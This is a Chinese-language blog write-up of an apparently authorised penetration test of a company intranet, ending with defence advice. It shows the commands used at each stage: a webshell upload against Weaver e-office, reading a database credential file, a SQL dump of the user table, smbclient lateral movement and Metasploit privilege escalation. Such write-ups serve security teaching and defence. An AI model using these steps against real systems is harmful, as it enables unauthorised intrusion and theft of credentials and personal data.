网络安全渗透攻击案例实战:某公司内网为目标的渗透测试全过程

知孤云出岫2025-07-25 19:51

目录

    • 一、案例背景
    • 二、目标分析(信息收集阶段)
      • [🌐 外部信息搜集](#🌐 外部信息搜集)
      • [🧠 指纹识别和端口扫描](#🧠 指纹识别和端口扫描)
    • 三、攻击流程(渗透测试全过程)
      • [🎯 步骤1:Web漏洞利用 ------ 泛微OA远程命令执行漏洞(CVE-2023-2648)](#🎯 步骤1:Web漏洞利用 —— 泛微OA远程命令执行漏洞(CVE-2023-2648))
      • [🔍 步骤2:权限维持与横向移动](#🔍 步骤2:权限维持与横向移动)
        • [2.1 获取本地密码信息](#2.1 获取本地密码信息)
        • [2.2 利用数据库读取其他管理员账号密码(Base64加密)](#2.2 利用数据库读取其他管理员账号密码(Base64加密))
        • [2.3 横向移动尝试:](#2.3 横向移动尝试:)
      • [🧠 步骤3:提权(本地提权)](#🧠 步骤3:提权(本地提权))
        • [漏洞利用:CVE-2016-0099(Windows Kernel 提权)](#漏洞利用:CVE-2016-0099(Windows Kernel 提权))
    • 四、攻击成果与影响
    • 五、防御建议
    • 六、关键使用工具列表

一、案例背景

  • 目标系统:某企业内部信息管理平台(Web系统 + 内网资源)

  • 测试授权:企业授权渗透测试,属于红队演练

  • 测试目的

    • 评估目标系统外部攻击面
    • 验证内网隔离和身份访问机制的安全性
    • 检测存在的高危漏洞

二、目标分析(信息收集阶段)

🌐 外部信息搜集

  • 使用工具:whoisnslookuptheHarvester

  • 收集内容:

    • 公司域名信息
    • 邮箱格式
    • 员工姓名/社交信息
    • 公布的IP段

🧠 指纹识别和端口扫描

  • 工具:nmap + whatweb + FOFA + Shodan

  • 发现信息:

    • 开放端口:80、443、21、22、445
    • 存在一台OA系统(泛微e-office)
bash 复制代码 
nmap -sS -sV -T4 -p- -Pn target_ip
whatweb http://target_ip

三、攻击流程(渗透测试全过程)

🎯 步骤1:Web漏洞利用 ------ 泛微OA远程命令执行漏洞(CVE-2023-2648)

  • 漏洞描述:某版本的e-office存在未授权RCE
  • 攻击方式:构造特定POST请求执行系统命令
bash 复制代码 
POST /page/exportImport/uploadOperation.jsp
Content-Type: multipart/form-data

file=@payload.jsp
  • 效果:上传webshell成功,获得Web权限

✅ 权限:www用户权限,进入Web目录

🔍 步骤2:权限维持与横向移动

2.1 获取本地密码信息
bash 复制代码 
dir /a /s | findstr config
type C:\Program Files\eOffice\config\db.properties
  • 拿到数据库密码 dbuser / dbpass,进一步连接数据库后台。
2.2 利用数据库读取其他管理员账号密码(Base64加密)
sql 复制代码 
SELECT username, password FROM user_table;
  • 解密后成功获得admin账号登录后台权限。
2.3 横向移动尝试:
  • 内网扫描工具:netstatarp -anmap -sP
  • 工具:msf, CrackMapExec, Impacket, smbclient
bash 复制代码 
smbclient //192.168.1.100/share -U "admin"
  • 发现另一台文件服务器开放smb,尝试连接并获取敏感文档。

🧠 步骤3:提权(本地提权)

  • 目标主机系统:Windows Server 2012 R2
  • 工具:WinPEAS, Sherlock, MSF local_exploit_suggester
漏洞利用:CVE-2016-0099(Windows Kernel 提权)
  • 使用Metasploit进行自动化提权:
bash 复制代码 
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set SESSION 1
run
  • 成功提权为System权限

四、攻击成果与影响

项目 结果
拿到webshell
获取数据库访问权限
获得OA系统管理员账户
横向入侵到文件服务器
成功提权为System权限
发现大量员工身份证件、薪资文档等敏感资料

五、防御建议

安全措施 建议内容
漏洞修补 尽快升级泛微e-office系统,打补丁
Web防护 WAF防护上传接口,过滤执行脚本
内网隔离 文件服务器应设置访问策略,不应开放匿名访问
权限控制 最小权限原则,限制System提权条件
日志审计 启用webshell行为监控与文件上传审计
应急响应 建立SOC联动机制,实现告警联动

六、关键使用工具列表

类型 工具名称 用途
信息收集 nmap, whatweb, FOFA 扫描与指纹识别
Web攻击 Burp Suite, curl, sqlmap 注入与漏洞利用
提权工具 WinPEAS, Metasploit 本地提权
横向移动 CrackMapExec, Impacket SMB、NTLM中继
后门控制 msfconsole, Behinder 维持访问通道
相关推荐
麦聪聊数据5 分钟前
为何通用堡垒机无法在数据库运维中实现精准风控?
数据库·sql·安全·低代码·架构
m0_466525291 小时前
绿盟科技风云卫AI安全能力平台成果重磅发布
大数据·数据库·人工智能·安全
晚霞的不甘2 小时前
守护智能边界:CANN 的 AI 安全机制深度解析
人工智能·安全·语言模型·自然语言处理·前端框架
枷锁—sha2 小时前
【SRC】SQL注入快速判定与应对策略(一)
网络·数据库·sql·安全·网络安全·系统安全
数字护盾(和中)2 小时前
信创生态 + 国密算法 筑牢数字安全韧性根基
安全
devmoon3 小时前
在 Polkadot 上部署独立区块链Paseo 测试网实战部署指南
开发语言·安全·区块链·polkadot·erc-20·测试网·独立链
成茂峰3 小时前
软考高级·系统架构设计师 | 四、信息技术安全知识
安全·信息安全·系统架构·架构设计师
向哆哆3 小时前
CANN生态安全保障:cann-security-module技术解读
人工智能·安全·cann
wuli_滔滔4 小时前
CANN安全机制源码探秘 仓库中的权限校验与数据加密实现
安全·cann
liann1194 小时前
3.1_网络——基础
网络·安全·web安全·http·网络安全
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03使用 1panel面板 部署 php网站04OpenClaw Chrome扩展使用教程 - 浏览器中继控制05Linux下V2Ray安装配置指南06Vue-skills的中文文档07UV安装并设置国内源08让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南09Claude Code Skills 实用使用手册10一文了解国产算子编程语言 TileLang,TileLang 对国产开源生态的影响与启示